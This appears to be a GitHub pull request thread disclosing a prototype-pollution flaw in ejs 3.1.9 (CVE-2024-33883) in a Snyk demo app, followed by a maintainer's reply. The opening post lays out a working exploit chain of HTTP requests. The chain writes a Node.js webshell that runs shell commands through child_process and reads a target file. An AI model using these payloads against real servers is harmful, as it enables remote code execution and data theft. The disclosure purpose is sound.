fix(deps): Insufficient Prototype Pollution Validation Leading to RCE Exploitation

[lamcodeofpwnosec]

snyk/snyk-apps-demo project was used ejs (aka Embedded JavaScript templates) lacks certain pollution protection. ejs@3.1.9, Insufficient Prototype Pollution Validation Leading to RCE Exploitation

• With prototype pollution, set opts.client to truthy value (condition)
• Then, when render() runs, ejs will run opts.escapeFunction value as JS code.

1. GET /pollute?target=client&value=1

2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");

3. GET /
- Inject webshell

4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");

5. GET /
- Activate webshell

Payloads:

function RCE( key ){ 
 const result = process.mainModule.require('child_process').execSync(`${key}`); 
 throw new Error(`Result leak from Error: ${result.toString()}`); 
}
 module.exports = RCE;

CWE-693
CWE-1321
CVE-2024-33883

[CLAassistant]

All committers have signed the CLA.

[jgresty]

The version of ejs used as a hard dependency (3.1.10) is not impacted, only the version pulled in as a transitive dependency of ejs-lint. Generally we don't consider dev dependencies when looking at security vulnerabilities internally, however thank you for alerting us to this case.

I have noticed you bumped the version of ejs-lint in the package-lock to one incompatible with the version range specified in the package.json, this change would be reverted as soon as anyone did an npm install.